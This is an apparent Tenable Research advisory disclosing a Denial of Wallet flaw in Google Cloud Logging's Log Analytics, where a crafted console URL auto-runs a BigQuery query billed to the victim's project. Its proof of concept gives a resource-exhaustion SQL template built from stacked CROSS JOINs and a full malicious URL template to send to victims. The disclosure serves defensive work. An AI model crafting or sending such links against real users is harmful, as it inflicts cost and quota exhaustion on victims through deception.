Google Cloud Platform (GCP) Cloud Logging Cross-Tenant Denial of Wallet with Log Analytics

Tenable Research has identified and responsibly disclosed a Denial of Wallet (DoW) vulnerability in Google Cloud Logging’s Log Analytics. This vulnerability allowed an attacker to force a victim’s project to execute massive, expensive BigQuery queries by visiting a maliciously crafted Cloud Logging URL.

When a user navigates to a Log Analytics URL, the embedded SQL query is automatically submitted, even when set to use the BigQuery engine. An attacker could exploit this by crafting a URL containing a “resource-exhaustion” query. By using multiple CROSS JOIN statements against massive public datasets (e.g., bigquery-public-data), the query can be designed to process terabytes of data. Because the BigQuery jobs are initiated within the victim’s project, the costs associated with the query processing are billed directly to the victim’s billing account. When the victim navigates to the URL, they may incur significant expenses or exhaust their quota.

Proof of Concept:

1. Create a malicious query that will process a massive amount of data:

SELECT *

  FROM

    `[VICTIM_PROJECT].global._Default._AllLogs`

    CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET].[PUBLIC_TABLE]`

    CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET2].[PUBLIC_TABLE2]`

    — Add many more CROSS JOINS to incur more costs

2. Craft a Log Analytics URL that will run the query in the victim’s project:

https://console.cloud.google.com/logs/analytics;queriedResources=%7B%22resources%22:%5B%22projects%2F[VICTIM_PROJECT]%2Flocations%2Fglobal%2Fbuckets%2F_Default%2Fviews%2F_AllLogs%22%5D%7D;queryHandle=%7B%22query%22:%22[MALICIOUS_QUERY]%22%7D;upperTab=query;lowerTab=query_results;queryLanguage=SQL;useReservedSlots=true?project=[VICTIM_PROJECT]&chartConfig=%7B%22xyChart%22:%7B%22constantLines%22:%5B%5D,%22dataSets%22:%5B%7B%22breakdowns%22:%5B%5D,%22dimensions%22:%5B%7B%22column%22:%22%22,%22columnType%22:%22%22,%22sortColumn%22:%22%22,%22sortOrder%22:%22SORT_ORDER_ASCENDING%22%7D%5D,%22measures%22:%5B%7B%22aggregationFunction%22:%7B%22parameters%22:%5B%5D,%22type%22:%22count%22%7D,%22column%22:%22%22%7D%5D,%22opsAnalyticsQuery%22:%7B%22queryExecutionRules%22:%7B%22useReservedSlots%22:true%7D,%22queryHandle%22:%22%22,%22sql%22:%22[MALICIOUS_QUERY]%22%7D,%22plotType%22:%22STACKED_BAR%22,%22pointConnectionMethod%22:%22GAP_DETECTION%22,%22sortOrderParameters%22:%5B%5D,%22targetAxis%22:%22Y1%22%7D%5D,%22options%22:%7B%22mode%22:%22COLOR%22%7D,%22y1Axis%22:%7B%22label%22:%22%22,%22scale%22:%22LINEAR%22%7D%7D%7D

1. Get the victim to browse to the new malicious URL, which will run the query automatically